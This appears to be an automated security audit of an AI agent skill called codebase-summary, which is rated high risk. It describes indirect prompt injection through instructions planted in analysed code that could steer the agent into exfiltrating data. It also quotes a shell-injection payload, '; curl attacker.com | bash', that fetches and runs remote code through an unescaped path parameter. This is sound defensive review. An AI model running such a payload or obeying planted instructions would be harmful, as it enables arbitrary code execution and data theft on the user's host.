codebase-summary

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • Indirect Prompt Injection (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8). It is designed to ingest the entire content of an untrusted codebase to produce an 'AI-optimized knowledge base' (index.md).
  • Ingestion points: Every file within the directory specified by codebase_path is analyzed by the scripts and potentially summarized.
  • Boundary markers: Absent. There are no delimiters or 'ignore instructions' warnings provided to the agent to distinguish between documentation and malicious instructions embedded in the analyzed code.
  • Capability inventory: The skill allows for shell execution (via local scripts), file modification (writing documentation), and 'consolidation' of summaries into root files like README.md.
  • Sanitization: Absent. Content is extracted and formatted into documentation that the agent is explicitly instructed to use as its 'primary context'.
  • Risk: An attacker could place malicious instructions inside a codebase file (e.g., inside a comment or a README) that, when summarized, instructs the AI agent to perform unauthorized actions like exfiltrating data or modifying the system.
  • Command Execution (HIGH): The skill workflow in SKILL.md constructs shell commands using string interpolation of user-provided parameters (codebase_path, output_dir).
  • Evidence: python {baseDir}/scripts/analyze_structure.py "{codebase_path}" --depth 4 --output "{output_dir}/codebase_info.md".
  • Risk: If these parameters are not strictly validated or escaped by the agent, a malicious path containing shell metacharacters (e.g., ; curl attacker.com | bash) could lead to arbitrary command execution on the host system.
  • Privilege Escalation (MEDIUM): The consolidate feature (Category 5) allows the agent to write data to the root of the codebase. If the consolidate_target parameter is manipulated, or if the agent is directed to a sensitive directory via codebase_path, it could be used to overwrite critical system configuration files or startup scripts.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 06:20 AM